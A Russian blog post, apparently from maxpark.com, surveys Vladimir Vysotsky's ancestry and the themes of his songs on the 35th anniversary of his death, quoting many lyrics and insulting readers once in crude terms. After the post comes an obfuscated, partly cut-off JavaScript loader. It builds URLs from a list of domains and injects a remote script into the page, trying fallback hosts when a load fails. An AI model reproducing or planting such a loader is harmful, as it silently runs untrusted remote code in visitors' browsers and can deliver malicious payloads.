35 лет назад умер поэт из белорусского рода Высоцких

Из Вики: "исследователи сходятся на том, что род Высоцких происходит из местечка Селец Пружанского уезда Гродненской губернии, ныне — Брестской областиБелоруссия[5]. Фамилия, вероятно, связана с названием города Высокое Каменецкого района Брестской области. Дед поэта по отцу, тоже Владимир Семёнович Высоцкий (при рожденииВольф Шлиомович) родился в 1889 г. в Бресте (в то время Брест-Литовск) в семье преподавателя русского языка".

Так что Высоцкий частично бульбаш и еврей. 25 июля исполнилось 35 лет, как он ушел из жизни в 42 года.

Я не знаток его творчества. В детстве фанател старший брат, в юности - парни, отслужившие срочную. Мне же не нравились его "блатные" песни. К старости же я все больше разделяю философию поэта Высоцкого. Именно поэтом он хотел быть признанным в последние годы, да не получилось. 

Я бы его творчество разделил  на три части.

Война. 

Как художник и свидетель послевоенной жизни без нее никак не мог. "На братских могилах", "А сыновья уходят в бой", "Почему все не так", "Давно смолкли залпы орудий", "Случай в ресторане", "Як-истребитель". Но он войну видел не как Юрий Озеров.

Немецкий снайпер дострелил меня

Убив того, который не стрелял

"Тот, который не стрелял"

Цепляет меня его "Песня о новом времени":

Наше время иное, лихое, но счастье как в старь ищи,
И в погоню за ним мы летим, убегающим вслед.
Только вот в этой скачке теряем мы лучших товарищей,
На скаку не заметив, что рядом товарища нет.


И когда наши девушки сменят шинели на платьица,
Не забыть бы тогда, не простить бы и не потерять

Блатная тема

Можно представить послевоенное время, где в городах, как говорят, был разгул криминала. У Высоцкого эта тема подана и с юмором:

Потом приказ про нашего полковника

Что он поймал двух очень крупных уголовников

Ему за нас и деньги, и два ордена

А он от радости все бил по морде нас.

"ЗК Васильев и Петров-ЗК"

И с надрывом

<pre>Эх, за веру мою беззаветную</pre> <pre>Сколько лет отдыхал я в раю!</pre> <pre>Променял я на жизнь беспросветную</pre> <pre>Несусветную глупость мою.</pre> <pre>"Банька по белому".</pre> <pre>И как-то по пацански:</pre> <pre>Ее, как водится, прпостил</pre> <pre>Того ж, кто раньше с нею был, не извиняю</pre> <pre>"Тот, кто раньше с нею был"</pre>

Философия жизни

Широкая тема. Тут и осмысление послевоенной поры:

Час зачатья помню неточно...

Первый срок отбывал я в утробе

Ничего там хорошего нету

Баллада о детстве

И "отраслевая" тема - и героическая альпинистская тема, и о море, и водительская тема, и космическая. Этот парень мог так рассказать о горах, что его в моем детстве считали альпинистом, который сидел в тюрьме.

Мне кажется, можно выделить и антисоветскую тему. Нет, Высоцкий не был явным оппом режима, но его свободная душа изначально в режим не вписалась.

Инвалиды считают, что написанные после смерти тирана стихи 15-летнего парня отражают мир художника. Себя вспомните в этом возврасте, дрочеры

 

Личность в штатском - парень рыжий

Мне представился в Париже

"Личность в штатском"

А люди все роптали и роптали

Люди справедливости хотят

Мы в очереди первыми стояли

А те, кто сзади нас - уже едят

"А люди все роптали и роптали"

А знаменитое "Письмо в редакцию":

Вся канатчикова дача к телевизеру рвалась

место чтоб поесть-помыться-уколоться и забыться.

А медикоментов груды мы в унитаз

И любовная тема

Не сравнил бы я любую с тобой

Хоть казни меня, расстреливай

Посмотри, как я любуюсь тобой

Как мадонной рафаэлевой.

"Дом хрустальный".

Есть у Высоцкого, по-моему, и тема неприятия простых человеческих пороков, которые есть в любом обществе - "Слухи", "Песня завистника", "Я не люблю".

Как-то так.

<script type="text/javascript">// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("maxpark.com")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}(); // ]]></script>